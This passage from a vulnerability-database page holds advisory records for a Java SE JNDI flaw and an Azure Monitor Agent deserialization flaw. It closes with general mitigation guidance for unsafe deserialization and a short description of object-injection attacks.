  "details": "Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).",
  "id": "GHSA-h547-5jph-p9qq",
  "modified": "2026-05-27T18:31:34Z",
  "published": "2022-10-19T12:00:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21624"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/37QDWJBGEPP65X43NXQTXQ7KASLUHON6"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3ARF4QF4N3X5GSFHXUBWARGLISGKJ33R"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3QLQ7OD33W6LT3HWI7VYDFFJLV75Y73K"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EXSBV3W6EP6B7XJ63Z2FPVBH6HAPGJ5T"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HNGMDNIHAA73BEX6XPA2IMXJSGOKKYE6"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PB3CIGOFG7CENUVVE4FFZT2HI5FO77XU"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/37QDWJBGEPP65X43NXQTXQ7KASLUHON6"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3ARF4QF4N3X5GSFHXUBWARGLISGKJ33R"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3QLQ7OD33W6LT3HWI7VYDFFJLV75Y73K"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EXSBV3W6EP6B7XJ63Z2FPVBH6HAPGJ5T"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HNGMDNIHAA73BEX6XPA2IMXJSGOKKYE6"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PB3CIGOFG7CENUVVE4FFZT2HI5FO77XU"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202401-25"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20221028-0012"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpuoct2022.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-H54C-4C22-CQMP

Vulnerability from github – Published: 2026-04-14 18:30 – Updated: 2026-04-14 18:30
VLAI
Details

Deserialization of untrusted data in Azure Monitor Agent allows an authorized attacker to elevate privileges locally.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-32192"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-14T18:17:25Z",
    "severity": "HIGH"
  },
  "details": "Deserialization of untrusted data in Azure Monitor Agent allows an authorized attacker to elevate privileges locally.",
  "id": "GHSA-h54c-4c22-cqmp",
  "modified": "2026-04-14T18:30:41Z",
  "published": "2026-04-14T18:30:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32192"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32192"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design Implementation

If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.

Mitigation
Implementation

When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.

Mitigation
Implementation

Explicitly define a final object() to prevent deserialization.

Mitigation
Architecture and Design Implementation
  • Make fields transient to protect them from deserialization.
  • An attempt to serialize and then deserialize a class containing transient fields will result in NULLs where the transient data should be. This is an excellent way to prevent time, environment-based, or sensitive variables from being carried over and used improperly.
Mitigation
Implementation

Avoid having unnecessary types or gadgets (a sequence of instances and method invocations that can self-execute during the deserialization process, often found in libraries) available that can be leveraged for malicious ends. This limits the potential for unintended or unauthorized types and gadgets to be leveraged by the attacker. Add only acceptable classes to an allowlist. Note: new gadgets are constantly being discovered, so this alone is not a sufficient mitigation.

Mitigation
Architecture and Design Implementation

Employ cryptography of the data or code for protection. However, it's important to note that it would still be client-side security. This is risky because if the client is compromised then the security implemented on the client (the cryptography) can be bypassed.

Mitigation MIT-29
Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].

CAPEC-586: Object Injection

An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. This can result in a number of unwanted outcomes, including remote code execution.